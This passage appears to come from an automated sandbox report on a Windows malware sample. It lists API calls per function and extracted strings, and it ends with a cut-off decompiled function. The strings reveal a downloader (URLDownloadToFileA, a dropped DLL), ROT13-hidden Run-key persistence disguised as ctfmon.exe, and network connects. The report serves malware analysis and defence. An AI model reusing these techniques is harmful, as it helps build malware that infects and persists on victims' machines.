                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00405168
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 00405196
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 004051C0
                                                                            • Part of subcall function 00404F82: rand.MSVCRT ref: 004051EF
                                                                          • SetFilePointer.KERNEL32 ref: 004055D4
                                                                          • WriteFile.KERNEL32 ref: 004055FA
                                                                          • Sleep.KERNEL32 ref: 00405609
                                                                          • SetFilePointer.KERNEL32 ref: 00405634
                                                                          • WriteFile.KERNEL32 ref: 0040565A
                                                                          • SetFilePointer.KERNEL32 ref: 0040567D
                                                                          • WriteFile.KERNEL32 ref: 004056AF
                                                                          • CloseHandle.KERNEL32 ref: 004056C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: rand$File$CountTicksrand$PointerWrite$LocalSleepTime$CloseCreateHandle_itoa
                                                                          • String ID:
                                                                          • API String ID: 3159365393-0
                                                                          • Opcode ID: 066013087a80cab26094ee465325437960832ad52aa8e7df595e92265ce101e2
                                                                          • Instruction ID: 8e21804255f859d75eeaefc39514b6d8a1434258e14ca154f06cca4555a00953
                                                                          • Opcode Fuzzy Hash: 066013087a80cab26094ee465325437960832ad52aa8e7df595e92265ce101e2
                                                                          • Instruction Fuzzy Hash: 0341A5B14087019AD700BF29C19935FBFF4BB84358F51892EE8986B282D7798249CF97
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressDeleteFileFreeLoadProcSleep
                                                                          • String ID: URLDownloadToFileA$donzx.dll$urlmon.dll
                                                                          • API String ID: 1591209584-4102153241
                                                                          • Opcode ID: 47fc18c0eb25ae1a6f3f7cc7ed24534ae3b86cfb75869dd93a874771333e5d9e
                                                                          • Instruction ID: 543b2787c70849a237c7d5d5e8862ee058c6e2dedd7614c5b7d168295bf2944d
                                                                          • Opcode Fuzzy Hash: 47fc18c0eb25ae1a6f3f7cc7ed24534ae3b86cfb75869dd93a874771333e5d9e
                                                                          • Instruction Fuzzy Hash: 1C21FCB09043459BD700EF39D58579ABBF0BB48304F108A7EE98997341E778D998CF9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$CountTickrandsrand
                                                                          • String ID: mvcsvnd.qyy
                                                                          • API String ID: 2629717045-1605320677
                                                                          • Opcode ID: f7e63bccf500b5fcbf6288392c2748b687ca740bfdce1b409f481ce8bf1a05ec
                                                                          • Instruction ID: 3c31970993b76fcb6f62e82551040ecc98f125b31847a965db22ab4f080a2362
                                                                          • Opcode Fuzzy Hash: f7e63bccf500b5fcbf6288392c2748b687ca740bfdce1b409f481ce8bf1a05ec
                                                                          • Instruction Fuzzy Hash: F441FBB59043048BCB10BF65D98569DBBF0BF84314F40897FE584A7381EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$CreateObjectProcessSingleWaitmemset
                                                                          • String ID: D$D
                                                                          • API String ID: 1209732917-143366177
                                                                          • Opcode ID: 8b0318b66af052caa6544f8935669438fa84808f2f8ff7b8a7a656b73dd8d3b3
                                                                          • Instruction ID: a424a9ca423c88ebceb4bf93d4a85606f6dbc14dab7ded7620f51e0c80248426
                                                                          • Opcode Fuzzy Hash: 8b0318b66af052caa6544f8935669438fa84808f2f8ff7b8a7a656b73dd8d3b3
                                                                          • Instruction Fuzzy Hash: 1D11A4B0904305DBEB00EF69C58935EBBF0BB44318F008A2DE894AB281D3799588CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Version
                                                                          • String ID: Unk$f2000$f2003$fVISta$fWinS$fXp
                                                                          • API String ID: 1889659487-2404033052
                                                                          • Opcode ID: 6bafecaaa7aee1d569267c96bf0f5a75bd16ea01fa60e304594bc5b44564bdeb
                                                                          • Instruction ID: e8bb7547553301c142e519b247f3baff17d1b23cd464d4725f64abea95698485
                                                                          • Opcode Fuzzy Hash: 6bafecaaa7aee1d569267c96bf0f5a75bd16ea01fa60e304594bc5b44564bdeb
                                                                          • Instruction Fuzzy Hash: DD118334A11718CACF34AA18891939B72B0EB93349F4441FBD88979690C3B98DC9CE1B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
                                                                            • Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
                                                                            • Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680
                                                                          • CreateFileA.KERNEL32 ref: 00405E5E
                                                                          • ExitProcess.KERNEL32 ref: 00405E7E
                                                                          • CloseHandle.KERNEL32 ref: 00405E9E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$CloseCreateDirectoryExitFileHandleProcessSystemlstrlenmemset
                                                                          • String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Eha$pgszra.rkr$user32.dll
                                                                          • API String ID: 1778546552-2563098034
                                                                          • Opcode ID: 74071c8a4e3613b750008268494174c79e934ec9dc8cd3874d7da89e717f8aea
                                                                          • Instruction ID: 8ce02ae271826c0af2d77be6dc83fb0dca404b62b159729ddab96385648218ed
                                                                          • Opcode Fuzzy Hash: 74071c8a4e3613b750008268494174c79e934ec9dc8cd3874d7da89e717f8aea
                                                                          • Instruction Fuzzy Hash: F3212AB08097049AD710BF21C58538EBBF4AF84358F41897EE9C867281D7BD858C8F96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • strchr.MSVCRT ref: 00405F28
                                                                          • GetProcessHeap.KERNEL32 ref: 00405F38
                                                                            • Part of subcall function 00409250: malloc.MSVCRT ref: 004092A3
                                                                            • Part of subcall function 004060AA: DnsQuery_A.DNSAPI ref: 004060E7
                                                                            • Part of subcall function 004060AA: GetProcessHeap.KERNEL32 ref: 0040610A
                                                                            • Part of subcall function 004060AA: RtlAllocateHeap.NTDLL ref: 00406122
                                                                            • Part of subcall function 004060AA: lstrcpy.KERNEL32 ref: 00406144
                                                                            • Part of subcall function 004060AA: GlobalFree.KERNEL32 ref: 00406182
                                                                          • GetProcessHeap.KERNEL32 ref: 00406049
                                                                          • HeapFree.KERNEL32 ref: 00406060
                                                                            • Part of subcall function 0040619A: memset.MSVCRT ref: 004061C4
                                                                            • Part of subcall function 0040619A: GetSystemTime.KERNEL32 ref: 00406249
                                                                            • Part of subcall function 0040619A: wsprintfA.USER32 ref: 004062BD
                                                                            • Part of subcall function 0040619A: socket.WS2_32 ref: 004062D9
                                                                            • Part of subcall function 0040619A: htons.WS2_32 ref: 004062F9
                                                                            • Part of subcall function 0040619A: inet_addr.WS2_32 ref: 0040630B
                                                                            • Part of subcall function 0040619A: gethostbyname.WS2_32 ref: 00406321
                                                                            • Part of subcall function 0040619A: connect.WS2_32 ref: 0040634D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free$AllocateGlobalQuery_SystemTimeconnectgethostbynamehtonsinet_addrlstrcpymallocmemsetsocketstrchrwsprintf
                                                                          • String ID: @$j_@
                                                                          • API String ID: 3179556216-3208567232
                                                                          • Opcode ID: fc9346dcb6b12ca964b5fee82d416c20218d364c213d814c77fce05a4a95092c
                                                                          • Instruction ID: 173fe34617f367652bf3f1e9fca4c53672752cc9009160b2f8c90af088e1383c
                                                                          • Opcode Fuzzy Hash: fc9346dcb6b12ca964b5fee82d416c20218d364c213d814c77fce05a4a95092c
                                                                          • Instruction Fuzzy Hash: 7551B4B4904709DFCB10DFA5C48468EBBF1FF88314F14862AE868A7395D3389846CF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue
                                                                          • String ID:
                                                                          • API String ID: 1151882462-0
                                                                          • Opcode ID: 49d06252631d2c5c8c2d25fde44a13d536e716d3c70b2a77a029649fafb08e20
                                                                          • Instruction ID: 444a06ef6d56dde007bbc20e4d8b26003c34dd805877e33333d77d24524e80d9
                                                                          • Opcode Fuzzy Hash: 49d06252631d2c5c8c2d25fde44a13d536e716d3c70b2a77a029649fafb08e20
                                                                          • Instruction Fuzzy Hash: 88513A70E003088FDB10EFA9DA8469EBBF4BB04304F14853AD845B7390DB78A955CF9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 50%
                                                                          			E0040BB20(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                          				void* _v12;
                                                                          				void* _v16;
                                                                          				void* _v20;
                                                                          				void* _v24;
                                                                          				void* _v28;
                                                                          				void* _v40;
                                                                          				intOrPtr _v52;
                                                                          				long _v56;
                                                                          				void* _v60;
                                                                          				intOrPtr _v84;
                                                                          				intOrPtr _v96;
                                                                          				void* _t54;
                                                                          				long _t56;
                                                                          				void* _t57;
                                                                          				void* _t58;
                                                                          				void* _t60;
                                                                          				void* _t62;
                                                                          				long _t65;
                                                                          				void* _t66;
                                                                          				void* _t67;
                                                                          				intOrPtr* _t70;
                                                                          				void* _t72;
                                                                          				void* _t78;
                                                                          				void* _t82;
                                                                          				void* _t88;
                                                                          				void* _t94;
                                                                          				intOrPtr _t101;
                                                                          				long _t113;
                                                                          				intOrPtr _t116;
                                                                          				intOrPtr _t117;
                                                                          				void* _t119;
                                                                          				intOrPtr* _t120;
                                                                          				long* _t121;
                                                                          				void** _t122;
                                                                          				long* _t123;
                                                                          				intOrPtr* _t124;
                                                                          
                                                                          				_t87 = __ebx;
                                                                          				_push(__ebx);
                                                                          				_t120 = _t119 - 0x1c;
                                                                          				_t54 =  *0x418284;
                                                                          				_t109 = _a4;
                                                                          				if(_t54 == 0) {
                                                                          					E0040B0E0(_t54);
                                                                          					_t54 =  *0x418284;
                                                                          					_t113 =  *(_t54 + 0x30);
                                                                          					if(_t113 >= 0) {
                                                                          						goto L2;
                                                                          					} else {
                                                                          						goto L15;
                                                                          					}
                                                                          					goto L47;
                                                                          				} else {
                                                                          					_t113 =  *(_t54 + 0x30);
                                                                          					if(_t113 < 0) {
                                                                          						L15:
                                                                          						E0040B3B0(_t87, _t113);
                                                                          						_t54 =  *0x418284;
                                                                          						_t88 =  *(_t54 + 0x30);
                                                                          						if(_t88 == 0) {
                                                                          							goto L3;
                                                                          						} else {
                                                                          							goto L17;
                                                                          						}
                                                                          						L47:
                                                                          					} else {
                                                                          						L2:
                                                                          						_t88 =  *(_t54 + 0x30);
                                                                          						if(_t88 != 0) {
                                                                          							L17:
                                                                          							_t56 = GetLastError();
                                                                          							 *_t120 =  *((intOrPtr*)(_t54 + 0x2c));
                                                                          							_t113 = _t56;
                                                                          							_t57 = TlsGetValue(??);
                                                                          							_t121 = _t120 - 4;
                                                                          							_t88 = _t57;
                                                                          							 *_t121 = _t113;
                                                                          							SetLastError(??);
                                                                          							_t58 = _t88;
                                                                          							_t120 = _t121 - 4;
                                                                          						} else {
                                                                          							L3:
                                                                          							_t58 =  *(_t54 + 0x28);
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				_v20 = _t58;
                                                                          				_v24 = _t58;
                                                                          				if( *((intOrPtr*)(_t109 + 0xc)) != 0) {
                                                                          					_t60 = E0040B8D0(_t109,  &_v24);
                                                                          				} else {
                                                                          					_t60 = E0040B6B0(_t109,  &_v24);
                                                                          				}
                                                                          				if(_t60 == 7) {
                                                                          					_t78 =  *0x418284;
                                                                          					_t88 = _v24;
                                                                          					if(_t78 == 0) {
                                                                          						E0040B0E0(_t78);
                                                                          						_t78 =  *0x418284;
                                                                          						if( *((intOrPtr*)(_t78 + 0x30)) >= 0) {
                                                                          							L9:
                                                                          							_t109 =  *((intOrPtr*)(_t78 + 0x30));
                                                                          							if( *((intOrPtr*)(_t78 + 0x30)) != 0) {
                                                                          								_v40 = _t88;
                                                                          								 *_t120 =  *((intOrPtr*)(_t78 + 0x2c));
                                                                          								if(TlsSetValue(??, ??) == 0) {
                                                                          									GetLastError();
                                                                          								}
                                                                          							} else {
                                                                          								 *(_t78 + 0x28) = _t88;
                                                                          							}
                                                                          							_t82 = _v24;
                                                                          							_t116 =  *((intOrPtr*)(_t82 + 0x20));
                                                                          							_t120 =  *((intOrPtr*)(_t82 + 0x28));
                                                                          							goto __ecx;
                                                                          						}
                                                                          						L22:
                                                                          						E0040B3B0(_t88, _t113);
                                                                          						_t78 =  *0x418284;
                                                                          						goto L9;
                                                                          					}
                                                                          					if( *((intOrPtr*)(_t78 + 0x30)) < 0) {
                                                                          						goto L22;
                                                                          					}
                                                                          					goto L9;
                                                                          				}
                                                                          				abort();
                                                                          				_push(_t116);
                                                                          				_t117 = _t120;
                                                                          				_t122 = _t120 - 0x28;
                                                                          				_v52 = _t109;
                                                                          				_t110 = _v40;
                                                                          				_v60 = _t88;
                                                                          				_v56 = _t113;
                                                                          				_t114 =  *(_t110 + 0xc);
                                                                          				if( *(_t110 + 0xc) == 0) {
                                                                          					 *_t122 = _t110;
                                                                          					return E0040B740();
                                                                          				} else {
                                                                          					_t62 =  *0x418284;
                                                                          					if(_t62 == 0) {
                                                                          						E0040B0E0(_t62);
                                                                          						_t62 =  *0x418284;
                                                                          					}
                                                                          					_t91 =  *((intOrPtr*)(_t62 + 0x30));
                                                                          					if( *((intOrPtr*)(_t62 + 0x30)) < 0) {
                                                                          						E0040B3B0(_t91, _t114);
                                                                          						_t62 =  *0x418284;
                                                                          					}
                                                                          					if( *((intOrPtr*)(_t62 + 0x30)) != 0) {
                                                                          						_t65 = GetLastError();
                                                                          						 *_t122 =  *(_t62 + 0x2c);
                                                                          						_t114 = _t65;
                                                                          						_t66 = TlsGetValue(??);
                                                                          						_t123 = _t122 - 4;
                                                                          						 *_t123 = _t65;
                                                                          						SetLastError(??);
                                                                          						_t67 = _t66;
                                                                          						_t122 = _t123 - 4;
                                                                          					} else {
                                                                          						_t67 =  *(_t62 + 0x28);
                                                                          					}
                                                                          					_v24 = _t67;
                                                                          					_v28 = _t67;
                                                                          					if(E0040B8D0(_t110,  &_v28) == 7) {
                                                                          						_t72 =  *0x418284;
                                                                          						_t94 = _v28;
                                                                          						if(_t72 == 0) {
                                                                          							E0040B0E0(_t72);
                                                                          							_t72 =  *0x418284;
                                                                          						}
                                                                          						if( *(_t72 + 0x30) < 0) {
                                                                          							E0040B3B0(_t94, _t114);
                                                                          							_t72 =  *0x418284;
                                                                          						}
                                                                          						_t110 =  *(_t72 + 0x30);
                                                                          						if( *(_t72 + 0x30) != 0) {
                                                                          							_v84 = _t94;
                                                                          							 *_t122 =  *(_t72 + 0x2c);
                                                                          							if(TlsSetValue(??, ??) == 0) {
                                                                          								GetLastError();
                                                                          							}
                                                                          						} else {
                                                                          							 *((intOrPtr*)(_t72 + 0x28)) = _t94;
                                                                          						}
                                                                          						_t62 = _v28;
                                                                          						_t117 =  *((intOrPtr*)(_t62 + 0x20));
                                                                          						_t122 =  *(_t62 + 0x28);
                                                                          						goto __ecx;
                                                                          					}
                                                                          					abort();
                                                                          					_push(_t117);
                                                                          					_t124 = _t122 - 8;
                                                                          					_t101 = _v84;
                                                                          					_t70 =  *((intOrPtr*)(_t101 + 8));
                                                                          					if(_t70 != 0) {
                                                                          						_v96 = _t101;
                                                                          						 *_t124 = 1;
                                                                          						return  *_t70();
                                                                          					} else {
                                                                          						return _t70;
                                                                          					}
                                                                          				}
                                                                          				goto L47;
                                                                          			}







































                                                                          0x0040bb20
                                                                          0x0040bb25
                                                                          0x0040bb26
                                                                          0x0040bb29
                                                                          0x0040bb2e
                                                                          0x0040bb33
                                                                          0x0040bbb4
                                                                          0x0040bbb9
                                                                          0x0040bbbe
                                                                          0x0040bbc3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040bb35
                                                                          0x0040bb35
                                                                          0x0040bb3a
                                                                          0x0040bbd0
                                                                          0x0040bbd0
                                                                          0x0040bbd5
                                                                          0x0040bbda
                                                                          0x0040bbdf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040bb40
                                                                          0x0040bb40
                                                                          0x0040bb40
                                                                          0x0040bb45
                                                                          0x0040bbf0
                                                                          0x0040bbf3
                                                                          0x0040bbf9
                                                                          0x0040bbfc
                                                                          0x0040bbfe
                                                                          0x0040bc04
                                                                          0x0040bc07
                                                                          0x0040bc09
                                                                          0x0040bc0c
                                                                          0x0040bc12
                                                                          0x0040bc14
                                                                          0x0040bb4b
                                                                          0x0040bb4b
                                                                          0x0040bb4b
                                                                          0x0040bb4b
                                                                          0x0040bb45
                                                                          0x0040bb3a
                                                                          0x0040bb4e
                                                                          0x0040bb54
                                                                          0x0040bb59
